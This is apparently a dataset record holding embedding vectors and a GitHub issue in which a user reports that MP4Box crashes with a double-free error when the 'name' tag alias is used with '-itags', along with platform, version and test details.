-0.0017242345493286848, 0.0034261434338986874, -0.008483783341944218, -0.021130459383130074, -0.002392289461567998, 0.01386944018304348, 0.0007938520284369588, -0.00703089265152812, 0.005777216050773859, -0.00010288089833920822, 0.012028425000607967, 0.001075070584192872, -0.03388017788529396, 0.008518130518496037, 0.004743362311273813, -0.008346394635736942, 0.0068591563031077385, -0.013546575792133808, -0.01699504442512989, -0.005402830429375172, -0.003908723127096891, -0.006096646189689636, 0.0193718783557415, 0.009472985751926899, 0.011149134486913681, -0.034347303211688995, -0.014123610220849514, 0.0043792808428406715, -0.014865512028336525, 0.002187923062592745, -0.0026842416264116764, -0.001733680022880435, 0.01090183388441801, 0.020965592935681343, 0.00004381964390631765, 0.005148660391569138, 0.02907155640423298, 0.003747290698811412, 0.004733058158308268, 0.009747764095664024, -0.00009606510866433382, 0.008765431120991707, -0.0070480662398040295, -0.01275658793747425, 0.0010965375695377588, -0.0044479756616055965, 0.013168754987418652, 0.016225665807724, 0.012557373382151127, -0.004197240341454744, -0.010427840985357761, 0.014824295416474342, 0.00574286887422204, -0.004873882047832012, 0.012694763019680977, -0.0011034070048481226, -0.00013771120575256646, 0.0357486717402935, 0.01606079749763012, 0.011025483720004559, 0.010675141587853432, 0.01248867902904749, -0.01931692287325859, -0.0018702105153352022, 0.014219783246517181, 0.01284589059650898, 0.0008612585952505469, -0.021941056475043297, 0.00778996804729104, 0.010998005978763103, 0.026433683931827545, -0.01810789667069912, 0.016294360160827637, -0.0029950847383588552, -0.0006886633927933872, 0.025430742651224136, -0.016692789271473885, -0.03442973643541336, 0.009143251925706863, 0.0006079472368583083, 0.023960677906870842, 0.014494561590254307, -0.019193271175026894, 0.018588759005069733, 0.010558360256254673, -0.01065453328192234, -0.033358100801706314, 0.008875343017280102, 0.016734005883336067, -0.007061805110424757, 0.01090183388441801, 0.018080418929457664, -0.0002445098652970046, 0.018698671832680702, -0.0067320712842047215, 0.01157504040747881, 0.003414121689274907, 0.020058823749423027, 0.02386450581252575, -0.008600564673542976, -0.0036373792681843042, 0.004417062737047672, -0.015703586861491203, 0.0111834816634655, -0.009198207408189774, 0.015057857148349285, -0.017585817724466324, -0.004235022235661745, 0.026282554492354393, 0.006371424533426762, -0.0006792178610339761, -0.012955802492797375, -0.007329714018851519, 0.0015653782756999135, 0.0012880237773060799, 0.013464142568409443, 0.008786039426922798, 0.02673593908548355, 0.012495548464357853, -0.01060644630342722, -0.003000236814841628, 0.009356205351650715, 0.005691347643733025, 0.006680550053715706, -0.003541206708177924, 0.008449436165392399, -0.0003707361756823957, 0.0038434630259871483, 0.004781144205480814, -0.011526954360306263, 0.018863538280129433, -0.0075014508329331875, -0.002361377002671361, -0.008449436165392399, 0.020718291401863098, -0.03588606044650078, 0.0025279612746089697, 0.002952150534838438, -0.00036494008963927627, -0.004087328910827637, 0.00968593917787075, 0.02253182977437973, -0.02452397346496582, 0.002572612836956978, -0.022559307515621185, 0.024111805483698845, -0.0015722477110102773, 0.006429814733564854, -0.002225705189630389, -0.003544641425833106, -0.0025537218898534775, 0.012035294435918331, -0.030308058485388756, 0.027436625212430954, 0.012385636568069458, -0.0007934226887300611, 0.021350283175706863, 0.014920467510819435, 0.016019580885767937, 0.00333512295037508, -0.002055685967206955, 0.017627034336328506, 0.00754266744479537, -0.0032217768020927906, -0.013278666883707047, -0.0261863823980093, -0.005217355210334063, -0.008291438221931458, 0.0057943896390497684, -0.000571453245356679, 0.009885153733193874, 0.01710495539009571, -0.01783311925828457, -0.0055642626248300076, 0.011739907786250114, -0.019907696172595024, 0.018643714487552643, 0.00983019731938839, 0.005004401784390211, 0.011355217546224594, 0.006683984771370888, 0.007384669966995716, -0.0006504520424641669, 0.013938134536147118, 0.01420604344457388, 0.00002814868639688939, 0.028054876253008842, 0.027890007942914963, 0.012880237773060799, 0.010585837997496128, 0.00958289671689272, -0.013113799504935741, 0.004399889148771763, 0.002060838043689728, -0.020127518102526665, 0.018286503851413727, 0.002436941023916006, -0.01578602008521557, 0.017201129347085953, 0.014164826832711697, 0.022339485585689545, 0.011355217546224594, -0.0033505791798233986, -0.004004895221441984, -0.013031366281211376, 0.008614303544163704, 0.011107916943728924, 0.028989123180508614, -0.010894964449107647, -0.008174657821655273, 0.0004443682264536619, -0.024166760966181755, 0.01617071032524109, 0.01626688241958618, -0.003929331433027983, -0.01353283692151308, -0.003699204418808222, 0.0030242798384279013, 0.016596615314483643, -0.02751905843615532, 0.01865745335817337, -0.014631950296461582, -0.01557993609458208, -0.00028293588547967374, 0.018808582797646523, 0.007707534357905388, 0.008744822815060616, -0.014906728640198708, -0.005804693792015314, -0.012200161814689636, -0.0035549458116292953, 0.01788807474076748, -0.0024214847944676876, 0.008937167935073376, -0.016692789271473885, 0.0024798752274364233, 0.013168754987418652, 0.00977524183690548, 0.0067286365665495396, -0.0037301168777048588, 0.005138356238603592, -0.003932766150683165, 0.018313981592655182, -0.01611575298011303, -0.01992143504321575, -0.015099073760211468, 0.009040209464728832, -0.03033553622663021, -0.011190351098775864, -0.022366963326931, 0.012213900685310364, 0.004159457981586456, 0.010750705376267433, -0.026832111179828644, -0.0010819400195032358, -0.0031153003219515085, 0.010489665903151035, 0.0017877770587801933, -0.0011360369389876723, -0.00170963688287884, 0.020223690196871758, -0.018300242722034454, -0.021666277199983597, 0.026145165786147118, -0.0007990041049197316, 0.0016907459357753396, 0.012928323820233345, -0.008511261083185673, 0.004451410379260778, -0.001902840449474752, -0.00880664773285389, 0.01820407062768936, 0.0020470991730690002, 0.0018753627082332969, -0.015497502870857716, 0.004698710981756449, -0.011911644600331783, 0.010276712477207184, -0.007741881534457207, 0.021460194140672684, -0.0006251208833418787, -0.013361100107431412, 0.002392289461567998, 0.00687976460903883, 0.0047364928759634495, 0.0009840502170845866, -0.012268856167793274, 0.02768392488360405, 0.00430371705442667, -0.0005272310809232295, -0.002564026042819023, -0.0012528178049251437, 0.04566817358136177, -0.0004937424673698843, -0.006230600643903017, 0.025444481521844864, 0.0031015612185001373, 0.009802719578146935, 0.0013481315691024065, -0.021267849951982498, 0.0026859589852392673, -0.009211946278810501, 0.011753646656870842, -0.01032479852437973, -0.005681043490767479, -0.01977030746638775, 0.0007590753375552595, -0.004784578923135996, -0.015126551501452923, -0.009857675060629845, 0.00661529041826725, -0.006340512074530125, -0.01176738552749157, 0.003422708483412862, 0.009218815714120865, 0.025664303451776505, -0.0015336070209741592, -0.009445508010685444, 0.003778203157708049, 0.011169742792844772, 0.013498489744961262, 0.0070480662398040295, -0.010544621385633945, 0.03640814125537872, 0.009418030269443989, 0.033413056284189224, 0.013993090949952602, 0.012131466530263424, -0.022943997755646706, 0.0007668035104870796, -0.004018634092062712, -0.007384669966995716, -0.007336583454161882, 0.01628062129020691, 0.009885153733193874, 0.005880258046090603, 0.0072953668422997, -0.0066015515476465225, 0.0067595490254461765, -0.0019303183071315289, 0.008236482739448547, -0.0034261434338986874, -0.026529856026172638, -0.016431748867034912, -0.018726149573922157, 0.005904301069676876, -0.015044118277728558, 0.041436582803726196, 0.02386450581252575, 0.010352276265621185, 0.0214189775288105, -0.020127518102526665, -0.014302216470241547, 0.007192324846982956, 0.019028404727578163, -0.0071167610585689545, 0.0028456738218665123, -0.013079452328383923, -0.01235128939151764, 0.007700664922595024, -0.004746797028928995, 0.0032028858549892902, -0.014741862192749977, 0.00227550882846117, -0.013388577848672867, 0.0009617244359105825, 0.004451410379260778, -0.012859629467129707, -0.007783098611980677, -0.0022222704719752073, 0.0018770800670608878, 0.010283581912517548, 0.009019601158797741, 0.01079879142343998, -0.0017182237934321165, 0.010036281310021877, -0.028219742700457573, 0.009644722566008568, -0.004056416451931, 0.013079452328383923, 0.0007698088884353638, -0.0027237411122769117, 0.012289464473724365, -0.009198207408189774, 0.02110298164188862, -0.012880237773060799, -0.010304190218448639, 0.017338518053293228, -0.010757574811577797, -0.02514222450554371, -0.026048993691802025, -0.0046781026758253574, 0.026048993691802025, 0.016459226608276367, 0.0029418463818728924, 0.0030706487596035004, 0.009782111272215843, 0.011018614284694195, 0.010159932076931, -0.019248228520154953, 0.021240370348095894, 0.0009780394611880183, 0.017132433131337166, -0.008593695238232613, -0.01237189769744873, -0.02397441677749157, 0.0007028316613286734, -0.009452377445995808, -0.009816458448767662, 0.005533350165933371, -0.003233798546716571, -0.014192304573953152, 0.017365995794534683, 0.010496535338461399, 0.015909669920802116, 0.008394480682909489, 0.026433683931827545, 0.02375459298491478, -0.013264928013086319, -0.028934165835380554, -0.01721486821770668, 0.004393019713461399, -0.027821313589811325, 0.014233522117137909, -0.009260032325983047, -0.01370457373559475, 0.002411180641502142, 0.007535798009485006, -0.0029813458677381277, -0.004265934694558382, -0.004698710981756449, -0.0004976065247319639, -0.008992123417556286, -0.020635858178138733, -0.013718312606215477, -0.01600584201514721, -0.0008956058882176876, 0.02684585005044937, 0.02198227308690548, 0.0033265361562371254, -0.01770946942269802, -0.008621172979474068, 0.011327739804983139, -0.0017293866258114576, 0.03250628709793091, 0.011039222590625286, -0.004915098659694195, 0.016129491850733757, -0.007151108235120773, -0.011829210445284843, -0.008044137619435787, 0.001139471773058176, 0.009404291398823261, 0.006931285373866558, -0.011403304524719715, -0.0031513648573309183, 0.0001759225851856172, 0.020635858178138733, 0.0024025938473641872, -0.012468070723116398, 0.015318896621465683, 0.0091363824903965, 0.007130499929189682, -0.0037095085717737675, -0.005416569299995899, 0.01688513346016407, 0.0055367848835885525, -0.02275165170431137, 0.009624114260077477, 0.0035858582705259323, -0.0047055804170668125, -0.0013567183632403612, -0.018849799409508705, -0.021501410752534866, 0.025842908769845963, 0.012158944271504879, 0.014741862192749977, -0.011300262063741684, 0.0013979352079331875, -0.001627203426323831, 0.0019131447188556194, -0.005430308170616627, 0.006989676039665937, 0.012172684073448181, 0.0381941981613636, -0.004090763628482819, -0.0018272764282301068, -0.005619218572974205, 0.038496457040309906, -0.01820407062768936, -0.0020625554025173187, -0.06017647311091423, 0.02525213547050953, -0.0018358632223680615, -0.013773268088698387, -0.013443533331155777, -0.02358972653746605, 0.008408219553530216, 0.028329653665423393, 0.01538759097456932, -0.005299788434058428, 0.005018140655010939, 0.020800726488232613, -0.01898718811571598, 0.017627034336328506, 0.00949359405785799, 0.010276712477207184, 0.012000947259366512, -0.01273597963154316, 0.0035789888352155685, 0.005258571822196245, 0.016706528142094612, 0.020292386412620544, -0.014920467510819435, 0.01743469014763832, 0.016321837902069092, 0.003293906105682254, -0.02470257878303528, -0.01240624487400055, 0.005492133554071188, 0.00651911785826087, 0.0252383965998888, -0.0016727135516703129, 0.007776229176670313, 0.006580942776054144, -0.003077518194913864, 0.013601531274616718, 0.02912651188671589, -0.004956315737217665, -0.01606079749763012, 0.007673187181353569, 0.01606079749763012, -0.0036545528564602137, -0.011581909842789173, -0.011691821739077568, 0.013361100107431412, 0.00269111106172204, 0.022064706310629845, -0.004746797028928995, 0.017970507964491844, -0.00763884000480175, -0.01206964161247015, 0.013086321763694286, 0.011478868313133717, -0.0021243805531412363, 0.03596849367022514, -0.0018564716447144747, -0.013745790347456932, -0.018753627315163612, 0.006316468585282564, 0.01470064464956522 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC build from source - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). ### Platform Mint 21.2 based on Ubuntu 22.04 jammy. Box is a BXNUC10i7FNH2 from 2022. 32G ram, no swap, <33% used. ### Background (skippable): I was late updating Mint 20.3 to 21.x... Afterwards, one of my scripts failed. The upgrade had replaced MP4Box 0.5 with Ubuntu 22.04's default 2.0 build. Building from a fresh clone (less than an hour ago) - same. After some trial and error I found it crashes on the `name` tag (_after_ successfully applying any other tags in the same command), and after a lot more trial and error I found it crashes only when the 'alias' is used, but not when the unaliased tag name is used. ### Sample bash log ``` bob@bob:~/Work/gpac/demo$ MP4Box MVI_3398.mp4 -itags name="Kuhfluchtwasserfall" Saving MVI_3398.mp4: In-place rewrite double free or corruption (fasttop) Aborted (core dumped) bob@bob:~/Work/gpac/demo$ MP4Box MVI_3398.mp4 -itags title="Kuhfluchtwasserfall" Saving MVI_3398.mp4: In-place rewrite bob@bob:~/Work/gpac/demo$ ``` ### Sample file (my own, hereby licensed public domain - but repoducible using any other I've found): https://www.mediafire.com/file/19bjtrey0xbi4s6/MVI_3398.mp4/file ### Tests I tried Tried with a swap partition, too, as the messages could fit a malloc problem - no change. Different files and/or command lines give different messages - sorry can't repro an example right now. `MP4Box - GPAC version 0.5.2-DEV-revVersion: 0.5.2-426-gc5ad4e4+dfsg5-5` extracted from timeshift - runs fine on the same platform (after making its libraries loadable through LD_LIBRARY_PATH). `MP4Box - GPAC version 2.3-DEV-rev476-gebfad0b53-master` freshly built as '--static-bin' using *only* unaltered Ubuntu repo sources and tools (I reverted a younger cmake for this) - same crash. Other string tag aliases I tried do not crash (encodingTool, sortName, albumArtist). The `artwork` alias does not crash but does not produce the same file as `cover` either (not recognized by MediaInfo as Cover:Yes but as binary blob - `cover` seems off in other ways, such as not being cumulative).
Using 'name' alias crashes a MP4Box -itags command
https://api.github.com/repos/gpac/gpac/issues/2560/comments
5
2023-08-15T09:22:44
2023-08-15T17:25:55Z
https://github.com/gpac/gpac/issues/2560
1,851,143,379
2,560
false
This is a GitHub Issue repo:gpac owner:gpac Title : Using 'name' alias crashes a MP4Box -itags command Issue date: --- start body --- - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC build from source - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). ### Platform Mint 21.2 based on Ubuntu 22.04 jammy. Box is a BXNUC10i7FNH2 from 2022. 32G ram, no swap, <33% used. ### Background (skippable): I was late updating Mint 20.3 to 21.x... Afterwards, one of my scripts failed. The upgrade had replaced MP4Box 0.5 with Ubuntu 22.04's default 2.0 build. Building from a fresh clone (less than an hour ago) - same. After some trial and error I found it crashes on the `name` tag (_after_ successfully applying any other tags in the same command), and after a lot more trial and error I found it crashes only when the 'alias' is used, but not when the unaliased tag name is used. ### Sample bash log ``` bob@bob:~/Work/gpac/demo$ MP4Box MVI_3398.mp4 -itags name="Kuhfluchtwasserfall" Saving MVI_3398.mp4: In-place rewrite double free or corruption (fasttop) Aborted (core dumped) bob@bob:~/Work/gpac/demo$ MP4Box MVI_3398.mp4 -itags title="Kuhfluchtwasserfall" Saving MVI_3398.mp4: In-place rewrite bob@bob:~/Work/gpac/demo$ ``` ### Sample file (my own, hereby licensed public domain - but repoducible using any other I've found): https://www.mediafire.com/file/19bjtrey0xbi4s6/MVI_3398.mp4/file ### Tests I tried Tried with a swap partition, too, as the messages could fit a malloc problem - no change. Different files and/or command lines give different messages - sorry can't repro an example right now. `MP4Box - GPAC version 0.5.2-DEV-revVersion: 0.5.2-426-gc5ad4e4+dfsg5-5` extracted from timeshift - runs fine on the same platform (after making its libraries loadable through LD_LIBRARY_PATH). `MP4Box - GPAC version 2.3-DEV-rev476-gebfad0b53-master` freshly built as '--static-bin' using *only* unaltered Ubuntu repo sources and tools (I reverted a younger cmake for this) - same crash. Other string tag aliases I tried do not crash (encodingTool, sortName, albumArtist). The `artwork` alias does not crash but does not produce the same file as `cover` either (not recognized by MediaInfo as Cover:Yes but as binary blob - `cover` seems off in other ways, such as not being cumulative). --- end body ---
2,540
[ -0.025262117385864258, 0.009257446974515915, -0.020225683227181435, 0.011096145026385784, 0.006075699348002672, 0.031193919479846954, -0.04620729014277458, 0.03965193033218384, -0.041218820959329605, 0.02489437721669674, -0.017539585009217262, -0.0014179962454363704, 0.008394057862460613, -0.008801769465208054, -0.0068031842820346355, 0.012782950885593891, -0.02606155164539814, 0.04636717960238457, -0.03786119818687439, -0.019506191834807396, 0.02735663577914238, -0.03405589237809181, -0.0200657956302166, 0.016212522983551025, -0.012415211647748947, 0.016340432688593864, -0.03348030149936676, 0.01934630610048771, -0.0027180758770555258, -0.009761090390384197, 0.005292253568768501, -0.00406712107360363, 0.015485038980841637, 0.062068063765764236, 0.0695827454328537, -0.02334347553551197, 0.053945813328027725, 0.08429232984781265, -0.01616455800831318, 0.006651291623711586, -0.021312912926077843, -0.028603751212358475, -0.06005349010229111, 0.028731660917401314, -0.02500629797577858, 0.023183589801192284, -0.008721825666725636, -0.0033736119512468576, -0.04326537251472473, 0.01625249534845352, 0.019634101539850235, -0.020913196727633476, -0.009928971529006958, -0.03162561357021332, 0.012415211647748947, -0.0448002852499485, 0.03527103364467621, 0.002456261310726404, -0.015357129275798798, 0.02734064683318138, 0.0014339849585667253, -0.025517936795949936, -0.028987480327486992, 0.019266361370682716, 0.014149983413517475, 0.011975523084402084, -0.024206863716244698, 0.012894871644675732, -0.021025117486715317, 0.030730247497558594, -0.007594624068588018, -0.02097715064883232, 0.008993634022772312, 0.01332656666636467, 0.0300747100263834, -0.06555359810590744, 0.022783871740102768, 0.028044147416949272, -0.038053061813116074, 0.04041938856244087, -0.03316052630543709, 0.03488730266690254, -0.027436578646302223, 0.022320199757814407, 0.007646587211638689, -0.008497984148561954, -0.015053343959152699, -0.06900715082883835, -0.026349347084760666, -0.02252805233001709, -0.01331857219338417, 0.023967035114765167, 0.004936505574733019, -0.0009378361282870173, -0.02794821560382843, 0.019953874871134758, -0.009273435920476913, 0.0023643262684345245, -0.034503575414419174, -0.014022073708474636, -0.01755557209253311, -0.013590379618108273, -0.011887584812939167, 0.01274297945201397, 0.005655996035784483, -0.006007747258991003, -0.007274850271642208, -0.038053061813116074, 0.004560771398246288, 0.13890966773033142, 0.02993081323802471, 0.00743473693728447, -0.03287272900342941, -0.014373824931681156, 0.03041047230362892, 0.022496076300740242, -0.01910647563636303, -0.033672165125608444, -0.02817205712199211, -0.017539585009217262, -0.025677822530269623, -0.013710294850170612, -0.018466927111148834, -0.0000061440882745955605, -0.02957906201481819, 0.029067423194646835, -0.02994680218398571, -0.016564274206757545, 0.0036434209905564785, 0.022607997059822083, -0.05225101113319397, -0.014621649868786335, 0.022256245836615562, 0.000430445303209126, 0.025981608778238297, 0.005256279371678829, -0.01661224104464054, -0.007794482633471489, -0.0033896006643772125, 0.0019576142076402903, -0.062100041657686234, -0.062100041657686234, 0.01544506661593914, -0.011559817008674145, -0.01373427826911211, -0.018355006352066994, -0.012527132406830788, -0.023983022198081017, -0.012758968397974968, -0.017171844840049744, -0.013310577720403671, -0.008330103009939194, 0.024798445403575897, 0.013582385145127773, 0.03191341087222099, 0.014877468347549438, 0.0005406173295341432, 0.0011152105871587992, -0.004055129364132881, -0.001057251589372754, -0.015748851001262665, -0.01510130986571312, 0.002262398600578308, -0.02088121883571148, 0.0027720376383513212, -0.0365821048617363, 0.028267988935112953, 0.032968662679195404, 0.0005755925667472184, 0.022719917818903923, 0.005819880403578281, -0.003205730812624097, 0.038148995488882065, 0.01362235751003027, -0.03269685432314873, -0.000024670036509633064, 0.010152813047170639, 0.032009340822696686, -0.015836790204048157, -0.007766502443701029, -0.03148171305656433, 0.012407217174768448, 0.009593209251761436, 0.00011648004874587059, 0.0005181332235224545, -0.01262306421995163, 0.014253909699618816, -0.024974321946501732, 0.028939515352249146, -0.011248038150370121, 0.008521967567503452, 0.017027946189045906, 0.011559817008674145, -0.011208065785467625, 0.05480920150876045, 0.011407924816012383, -0.03587860241532326, -0.01085631549358368, -0.0016568271676078439, 0.004448850639164448, 0.034375667572021484, -0.02240014262497425, -0.01013682410120964, -0.02324754372239113, -0.005264273378998041, 0.025997597724199295, -0.006319526582956314, 0.02132890187203884, 0.027308668941259384, -0.015628935769200325, -0.03878854215145111, -0.026733076199889183, 0.011319986544549465, 0.024686524644494057, -0.019426248967647552, 0.0012521136086434126, -0.005715953651815653, 0.02311963401734829, -0.0068911220878362656, -0.019250372424721718, 0.022112347185611725, 0.0016938010230660439, 0.03090612217783928, -0.043233394622802734, -0.01079236064106226, -0.004728652536869049, -0.0100249033421278, -0.0070470115169882774, -0.04252989590167999, 0.02382313646376133, 0.04102695733308792, 0.00842603575438261, 0.017843369394540787, 0.02228822186589241, 0.02783629484474659, 0.027676409110426903, 0.006751221138983965, 0.0010672445641830564, 0.014509729109704494, 0.016596252098679543, 0.003937212750315666, 0.0483497753739357, -0.011639760807156563, -0.02132890187203884, 0.0218085628002882, 0.06414659321308136, 0.0021644679363816977, -0.017747437581419945, -0.026621155440807343, 0.018818678334355354, -0.009073576889932156, -0.0012910860823467374, 0.011671737767755985, 0.008721825666725636, -0.01367032341659069, 0.04189034551382065, -0.007346799597144127, -0.004712664056569338, -0.0008718828321434557, -0.016436364501714706, 0.011216060258448124, 0.015197242610156536, -0.02169664204120636, 0.008641882799565792, 0.01990590989589691, -0.014373824931681156, -0.028619740158319473, -0.012127415277063847, 0.015077327378094196, -0.018019244074821472, 0.004484825301915407, -0.00996894296258688, -0.004109091125428677, 0.000053836891311220825, -0.025166185572743416, -0.006487407721579075, -0.008038310334086418, 0.020801275968551636, 0.028699684888124466, -0.021856527775526047, 0.03175352141261101, 0.006359498482197523, -0.004436859395354986, 0.03664606064558029, 0.011991511099040508, 0.014701592735946178, 0.01014481857419014, 0.005092395003885031, -0.006519385147839785, -0.003369614714756608, 0.01344648189842701, 0.04163452610373497, -0.002194446511566639, 0.013726283796131611, 0.012774957343935966, 0.00769055588170886, -0.004376901779323816, 0.008062292821705341, 0.011160099878907204, 0.03229713812470436, -0.00761061254888773, 0.011575805954635143, -0.007202901411801577, -0.015181253664195538, -0.012703008018434048, 0.023855114355683327, 0.00984902773052454, 0.030506405979394913, -0.043936897069215775, -0.003085815580561757, -0.006427450105547905, -0.023743193596601486, -0.02855578623712063, -0.011120128445327282, -0.0170919019728899, -0.013902159407734871, -0.010240750387310982, -0.03044245019555092, -0.030986065044999123, -0.004816590342670679, 0.0028599754441529512, -0.01068043988198042, -0.03079420141875744, -0.022671950981020927, 0.045247968286275864, -0.018115175887942314, -0.03488730266690254, 0.006371489726006985, -0.028012171387672424, -0.0009917978895828128, -0.012639053165912628, -0.012695013545453548, 0.012087443843483925, -0.009433322586119175, 0.010744394734501839, -0.015293174423277378, -0.0014439778169617057, -0.006647294387221336, 0.04137871041893959, -0.015996675938367844, -0.046974748373031616, 0.05640807002782822, 0.014461763203144073, 0.0153251513838768, -0.006483410485088825, -0.03408787027001381, -0.004153060261160135, 0.01957014761865139, 0.04272175952792168, -0.023279521614313126, 0.0011351964203640819, 0.007626601494848728, 0.013526424765586853, 0.017491618171334267, -0.00527626508846879, -0.039683908224105835, -0.0028739655390381813, -0.03587860241532326, 0.017475629225373268, 0.020913196727633476, 0.018019244074821472, -0.03395996242761612, -0.0012361250119283795, 0.00836208090186119, -0.01557297632098198, -0.013974107801914215, -0.012782950885593891, 0.004400884732604027, -0.014797525480389595, -0.024126920849084854, 0.0035874606110155582, 0.00500845443457365, -0.055832479149103165, 0.016660206019878387, -0.02569381147623062, -0.005791900213807821, 0.02687697485089302, -0.004089105408638716, -0.049820732325315475, 0.0017097897361963987, -0.03984379395842552, -0.022224267944693565, 0.04291362315416336, -0.030458439141511917, -0.006807181518524885, 0.0028220023959875107, -0.012695013545453548, 0.03053838200867176, -0.006479413248598576, -0.04278571158647537, -0.05020446330308914, 0.004932508338242769, -0.035079170018434525, -0.045215994119644165, -0.03199335187673569, 0.02252805233001709, -0.04857361689209938, -0.03632628545165062, 0.018722746521234512, -0.029323242604732513, 0.049468982964754105, -0.03197736293077469, 0.00785044301301241, 0.03559080511331558, -0.01255910936743021, 0.04064323008060455, -0.018786700442433357, -0.012175381183624268, 0.022783871740102768, 0.014957412146031857, 0.011615777388215065, -0.005460134707391262, 0.00008656372665427625, 0.0030498411506414413, 0.004324938636273146, 0.020593421533703804, 0.010824337601661682, 0.011743687093257904, -0.015724869444966316, 0.025997597724199295, -0.02865171805024147, -0.007482703309506178, -0.001177166705019772, 0.012095438316464424, 0.029323242604732513, 0.030634313821792603, -0.010752388276159763, 0.007858437485992908, 0.017539585009217262, -0.0265412125736475, 0.011975523084402084, -0.03157764673233032, -0.009513265453279018, 0.015421084128320217, -0.021792573854327202, -0.047678250819444656, -0.023519352078437805, -0.02628539316356182, -0.0037513445131480694, -0.003981181886047125, -0.015061338432133198, 0.04467237740755081, 0.009745101444423199, 0.010976229794323444, 0.030506405979394913, -0.0065393708646297455, -0.031177930533885956, -0.0045807575806975365, 0.018962576985359192, 0.015740856528282166, -0.0068991160951554775, 0.019778000190854073, -0.024686524644494057, -0.025965619832277298, 0.01638839952647686, 0.0035874606110155582, 0.01721980981528759, -0.007454723119735718, 0.04300955310463905, -0.0026161482091993093, -0.000024326529455720447, 0.0036773968022316694, -0.0020665370393544436, -0.014605660922825336, 0.03210527449846268, 0.017267776653170586, 0.01291086059063673, -0.017731448635458946, 0.0156209422275424, 0.005811885930597782, -0.000759462418500334, 0.003547488711774349, 0.039907749742269516, 0.013878175988793373, -0.010632473975419998, 0.0011511851334944367, 0.0034655467607080936, -0.01344648189842701, 0.004456845112144947, -0.045471809804439545, 0.00807428453117609, -0.03020261973142624, -0.018370995298027992, -0.0006170631968416274, 0.01910647563636303, -0.008346091955900192, -0.0271008163690567, -0.034023914486169815, -0.000593080185353756, 0.027196748182177544, -0.006467422004789114, 0.013518430292606354, -0.010928263887763023, -0.011583800427615643, 0.007150937803089619, 0.01710788905620575, -0.013758260756731033, -0.016244500875473022, 0.018930599093437195, 0.029275277629494667, 0.017043935135006905, -0.02371121570467949, 0.005811885930597782, 0.020129751414060593, 0.0507480762898922, -0.04940502718091011, -0.042753737419843674, 0.044992152601480484, 0.00814223662018776, -0.01570088602602482, -0.026972906664013863, -0.018339017406105995, 0.01604464277625084, -0.0365501269698143, -0.006647294387221336, -0.03053838200867176, 0.029786914587020874, -0.017763426527380943, 0.0388844758272171, 0.0021204990334808826, -0.026589177548885345, -0.014133994467556477, 0.00005808388232253492, 0.029163356870412827, -0.014213938266038895, -0.0046287234872579575, 0.0018237089971080422, -0.003547488711774349, -0.002502228831872344, -0.0010127830319106579, -0.002716077258810401, -0.019666079431772232, -0.014277893118560314, 0.022256245836615562, -0.031785499304533005, 0.023311497643589973, 0.0030658298637717962, 0.0007010037661530077, -0.006199611350893974, -0.013630351051688194, -0.011591794900596142, 0.04425667226314545, -0.03348030149936676, 0.020897207781672478, -0.01920240744948387, 0.03706176578998566, 0.0067152464762330055, 0.013158685527741909, -0.01068043988198042, -0.009193492121994495, 0.006931093521416187, 0.004420870449393988, 0.015421084128320217, 0.02935522049665451, 0.00996094848960638, 0.0365821048617363, 0.023519352078437805, 0.015365123748779297, 0.0018107182113453746, 0.008002335205674171, 0.012119420804083347, 0.014181961305439472, -0.01568489708006382, -0.0009003626764751971, -0.022703928872942924, 0.006791192572563887, 0.027196748182177544, 0.011575805954635143, -0.028859570622444153, -0.008050301112234592, 0.010272728279232979, -0.018706757575273514, 0.0206413883715868, -0.002833993872627616, -0.044992152601480484, -0.01108015701174736, 0.012926849536597729, -0.029914824292063713, 0.002877962775528431, -0.020689355209469795, 0.029035447165369987, -0.030394485220313072, -0.012247330509126186, -0.003455553902313113, 0.034823350608348846, -0.0057199508883059025, 0.0016138575738295913, 0.006459427531808615, -0.021888505667448044, 0.0055840471759438515, -0.010344677604734898, -0.00007020030898274854, -0.01079236064106226, -0.01980997622013092, 0.01792331226170063, 0.010096852667629719, -0.026013584807515144, 0.027500532567501068, 0.048061978071928024, -0.01036866009235382, -0.017363708466291428, 0.020257659256458282, 0.002458259928971529, -0.00783445406705141, -0.03360820934176445, 0.017059924080967903, 0.0170919019728899, -0.032489001750946045, -0.018370995298027992, 0.039204247295856476, -0.00265412125736475, 0.0330326184630394, 0.04975678026676178, -0.008122250437736511, 0.016468342393636703, 0.026701098307967186, 0.021009128540754318, -0.001994588179513812, -0.01862681470811367, 0.02169664204120636, 0.025645846500992775, -0.037317585200071335, 0.024382740259170532, -0.02807612530887127, -0.03882052004337311, 0.038500744849443436, 0.00808227900415659, -0.004916519857943058, -0.0019296340178698301, -0.0014399806968867779, -0.03575069457292557, 0.01768348179757595, -0.014493740163743496, -0.04067520797252655, -0.026669122278690338, 0.012814928777515888, 0.017171844840049744, -0.014861480332911015, 0.006063707638531923, 0.006351504009217024, -0.004576760344207287, -0.007598621305078268, 0.0012331270845606923, 0.028331944718956947, -0.019873932003974915, 0.016004670411348343, 0.01522122509777546, -0.004233003593981266, 0.021552743390202522, 0.027532510459423065, -0.040163569152355194, 0.013278600759804249, -0.006767209619283676, 0.02583771012723446, -0.009297418408095837, 0.003471542615443468, 0.043713055551052094, 0.05480920150876045, -0.009641175158321857, 0.014469757676124573, -0.02217630110681057, -0.027292679995298386, -0.0039631943218410015, -0.020801275968551636, 0.0170919019728899, 0.00036848915624432266, 0.0005186328780837357, -0.014205943793058395, 0.007414751220494509, -0.021169014275074005, -0.00025581891532056034, -0.02558189071714878, 0.0013020782498642802, 0.01291086059063673, 0.0013430493418127298, -0.013254617340862751, -0.012287301942706108, -0.0065873367711901665, -0.006487407721579075, -0.011527840048074722, -0.0020405554678291082, -0.011807641945779324, -0.02724471502006054, 0.00498047424480319, -0.03274482116103172, 0.0015009375056251884, -0.03077821247279644, 0.009129537269473076, -0.0029299259185791016, -0.020721331238746643, -0.00528026232495904, 0.0034315709490329027, -0.020449524745345116, 0.02559787966310978, -0.0000017526655256006052, -0.0170759130269289, 0.0027200744953006506, -0.01825907453894615, -0.006275557912886143, 0.006003750022500753, -0.02276788279414177, -0.003727361559867859, 0.006263566203415394, -0.032840751111507416, -0.015229219570755959, 0.0111920777708292, 0.000042063973523909226, -0.002877962775528431, 0.03216922655701637, -0.0026481254026293755, -0.011695721186697483, 0.004077113699167967, 0.00848999060690403, 0.04531192407011986, 0.026844996958971024, 